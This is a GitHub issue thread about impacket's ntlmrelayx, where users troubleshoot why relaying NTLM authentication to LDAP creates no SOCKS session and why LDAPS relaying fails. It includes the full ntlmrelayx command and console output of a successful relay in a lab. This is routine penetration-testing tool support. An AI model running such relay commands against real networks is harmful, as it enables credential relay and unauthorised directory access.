LDAP relay in ntlmrelayx does not create active sessions #514

Open
imaibou opened this issue Nov 10, 2018 · 6 comments · May be fixed by #1825
Labels
enhancement Implemented features can be improved or revised

Comments

@imaibou
Contributor

imaibou commented Nov 10, 2018

When targeting the LDAP service of a server and then receiving a connection in NTLMRelay, there is no LDAP session created:

sudo ntlmrelayx.py -t ldap://192.168.56.254 -socks --no-da --no-acl --no-dump -l /tmp/loot1
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] IMAP Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>  * Serving Flask app "impacket.examples.ntlmrelayx.servers.socksserver" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off

ntlmrelayx> [*] SMBD: Received connection from 192.168.56.1, attacking target ldap://192.168.56.254
[*] Authenticating against ldap://192.168.56.254 as <redacted>\<redacted> SUCCEED

ntlmrelayx> socks
[*] No Relays Available!
ntlmrelayx> 

Is there something I am missing? I am using impacket on an Ubuntu machine against a Windows Server 2012 R2 VirtualBox machine with LDAP signing disabled.

Thanks.

@imaibou imaibou changed the title from "LDAP relyy" to "LDAP relay in ntlmrelayx does not create active sessions" Nov 10, 2018
@imaibou
Contributor Author

imaibou commented Nov 10, 2018

Also maybe related, when targeting the LDAPS service, I get the following error:

ntlmrelayx> [*] SMBD: Received connection from 192.168.56.1, attacking target ldaps://192.168.56.254
[-] Connection against target ldaps://192.168.56.254 FAILED: ('unable to open socket', [(LDAPSocketOpenError('socket ssl wrapping error: [Errno 104] Connection reset by peer',), ('192.168.56.254', 636))])

@asolino
Collaborator

asolino commented Nov 11, 2018

Can you run the script with -debug to check if there's anything else useful? (CCing @dirkjanm)

@dirkjanm
Contributor

The SOCKS server does not yet support LDAP(s), so only the default attacks will work here. As you disabled them all on the command line it won't do anything except relaying the connection.
As for the LDAPS not working, I have seen this a few times myself and think it has something to do with whether the SSL certificates are set correctly on the server. Usually targeting another DC worked for me with this.

@asolino
Collaborator

asolino commented Nov 15, 2018

Thanks for the info @dirkjanm. Leaving this open until we support SOCKS LDAP.

@asolino asolino added the enhancement Implemented features can be improved or revised label Nov 15, 2018
@ad0nis

ad0nis commented Mar 6, 2019

Hitting the "Connection reset by peer" on LDAPS for every DC in my target organization. Assuming that's related to the certificate not validating, I'd love to be able to disable certificate validation, as most organizations are going to have a self-signed root cert instead of a valid SSL cert for their domain anyway...

(Sorry for tacking this onto the existing bug if this should be a separate issue.)

@EAGAIIN

EAGAIIN commented Jul 30, 2023

The SOCKS server does not yet support LDAP(s), so only the default attacks will work here. As you disabled them all on the command line it won't do anything except relaying the connection. As for the LDAPS not working, I have seen this a few times myself and think it has something to do with whether the SSL certificates are set correctly on the server. Usually targeting another DC worked for me with this.

Is this something that one day might be available?

b1two added a commit to b1two/impacket that referenced this issue Oct 6, 2024